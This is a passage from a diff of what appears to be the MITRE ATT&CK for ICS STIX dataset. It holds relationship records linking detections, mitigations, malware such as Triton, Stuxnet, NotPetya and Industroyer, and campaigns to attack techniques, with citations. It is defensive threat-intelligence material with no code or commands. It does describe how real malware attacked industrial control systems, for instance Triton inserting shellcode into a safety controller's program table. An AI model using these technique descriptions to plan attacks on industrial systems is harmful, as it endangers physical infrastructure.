"x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eb06ac7d-117a-48ab-ae3b-8bfa8f332f60", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:42:04.422Z", + "description": "Monitor for newly constructed files written to disk through a user visiting a website over the normal course of browsing.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f15f24d2-e581-46ce-83e4-a924f572aae6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--686cbd74-ef49-4e77-9599-21777d3a4738", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.174Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d1971b32-3a15-4544-9f36-80c05121deb6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.160Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--79d05cb2-ded0-4847-b52e-af7af421f303", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kevin Savage and Branko Spasojevic", + "description": "Kevin Savage and Branko Spasojevic W32.Flamer Retrieved. 2019/11/03 ", + "url": "https://web.archive.org/web/20190930124504/https://www.symantec.com/security-center/writeup/2012-052811-0308-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:50:07.974Z", + "description": "[Flame](https://attack.mitre.org/software/S0143) can collect AutoCAD design data and visio diagrams as well as other documents that may contain operational information. (Citation: Kevin Savage and Branko Spasojevic)", + "relationship_type": "uses", + "source_ref": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--63ca148e-12c9-4090-b51e-a8fb7a847a2a", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + }, + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:25:29.480Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s argument-setting and inject.bin shellcode are added to the program table on the Tricon so that they are executed by the firmware once each cycle. (Citation: DHS CISA February 2019) (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--73a48431-3597-4a72-acb8-c1e5019073e2", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Twitter ItsReallyNick Masquerading Update", + "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.", + "url": "https://twitter.com/ItsReallyNick/status/1055321652777619457" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:41:24.266Z", + "description": "Monitor executed commands and arguments that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.(Citation: Twitter ItsReallyNick Masquerading Update)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ab306654-2abb-4983-8d30-df4058adb06c", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Selena Larson, Camille Singleton December 2020", + "description": "Selena Larson, Camille Singleton 2020, December RANSOMWARE IN ICS ENVIRONMENTS Retrieved. 2021/04/12 ", + "url": "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf?utm_referrer=https%3A%2F%2Fwww.dragos.com%2Fresource%2Fransomware-in-ics-environments%2F" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:06:16.474Z", + "description": "The [REvil](https://attack.mitre.org/software/S0496) malware gained access to an organizations network and encrypted sensitive files used by OT equipment. (Citation: Selena Larson, Camille Singleton December 2020)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--111f437a-c67d-40e4-9515-7e9b22e65eff", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.234Z", + "relationship_type": "mitigates", + "description": "Audit domain and local accounts and their permission levels routinely to look for situations that could allow an adversary to gain system wide access with stolen privileged account credentials. (Citation: Microsoft May 2017) (Citation: Microsoft August 2018)These audits should also identify if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft February 2019)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "Microsoft May 2017", + "description": "Microsoft 2017, May Attractive Accounts for Credential Theft Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/attractive-accounts-for-credential-theft" + }, + { + "source_name": "Microsoft August 2018", + "description": "Microsoft 2018, August Implementing Least-Privilege Administrative Models Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models" + }, + { + "source_name": "Microsoft February 2019", + "description": "Microsoft 2019, February Active Directory administrative tier model Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3663f10d-4a2c-4d37-bf5f-337c9891c2f4", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:55:14.211Z", + "description": "Monitor for newly executed processes that depend on user interaction, especially for applications that can embed programmatic capabilities (e.g., Microsoft Office products with scripts, installers, zip files). This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads. For added context on adversary procedures and background see [User Execution](https://attack.mitre.org/techniques/T1204) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--739e7b8d-57d7-4c1d-8f42-1496606ea666", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Symantec 2019, March 27 Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved. 2019/12/02 Magnallium Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/magnallium/" + }, + { + "source_name": "Symantec March 2019", + "description": "Symantec 2019, March 27 Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved. 2019/12/02 ", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:42:15.944Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) utilized PowerShell scripts to establish command and control and install files for execution. (Citation: Symantec March 2019) (Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:58:34.751Z", + "description": "Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f584a257-c22a-434b-aa2d-6220987821ab", + "created": "2021-10-13T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:29:11.326Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) can communicate with the implant utilizing the TriStation 'get main processor diagnostic data' command and looks for a specifically crafted packet body from which it extracts a command value and its arguments. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ae7ed6d8-65cc-45a0-82c3-c28e5630bf7c", + "created": "2023-03-10T20:36:34.109Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:36:34.109Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary used a two-way radio to communicate with and set the frequencies of Maroochy Shire's repeater stations.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f8cf3800-6521-41d9-b272-d6ba2db0ccd2", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:09:42.474Z", + "description": "Monitor network traffic for ICS functions related to write commands for an excessive number of I/O points or manipulating a single value an excessive number of times.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4369da69-bb09-4cc8-8600-081a450f50e0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.120Z", + "relationship_type": "mitigates", + "description": "Ensure that unnecessary ports and services are closed to prevent risk of discovery and potential exploitation.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--06f15629-d050-434a-aed1-3bb3f90c97b2", + "created": "2022-09-27T15:22:37.864Z", + "revoked": false, + "external_references": [ + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:22:37.864Z", + "description": "Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL) For added context on adversary procedures and background see [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--82b20c35-88c6-49aa-8241-a59512b17b74", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T16:00:35.053Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was able to self-replicate by being spread through removable drives. A willing insider or unknown third party, such as a contractor, may have brought the removable media into the target environment. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) The earliest version of Stuxnet relied on physical installation, infecting target systems when an infected configuration file carried by a USB stick was opened. (Citation: Langer Stuxnet)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6258c355-677c-452d-b1fc-27767232437b", + "created": "2019-03-26T16:19:52.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:58:23.141Z", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) can move laterally through industrial networks by means of the SMB service. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b401f65c-5324-4fc0-8fce-0aa2ebf1f919", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:00:06.347Z", + "description": "Monitor ICS management protocols for parameter changes, including for unexpected values, changes far exceeding standard values, or for parameters being changed in an unexpected way (e.g., via a new function, at an unusual time).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dded2d68-35c7-42c4-af10-efe7731673e3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.108Z", + "relationship_type": "mitigates", + "description": "All APIs on remote systems or local processes should require the authentication of users before executing any code or system changes.\n", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--bf75ca96-3f9d-413c-a244-888a3fbf0be3", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:37:24.268Z", + "description": "Monitor for unexpected files (e.g., .pdf, .docx, .jpg) viewed for collecting internal data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--af24e067-966d-41f8-b1ea-5a6e11ff1a2a", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:39:13.371Z", + "description": "Monitor for newly executed processes that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0dca1f7d-9965-467a-bea5-b8baa7c8b9fc", + "created": "2022-09-26T14:27:28.370Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:27:28.370Z", + "description": "Various techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity which may precede this technique.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b116fcca-e872-4735-b7e2-4e4c8e34621a", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:56:58.977Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--62e818b8-38e6-42ff-9424-9a327332eb2a", + "created": "2022-09-29T20:02:37.671Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T15:22:56.606Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) IEC 61850 component sends the domain-specific 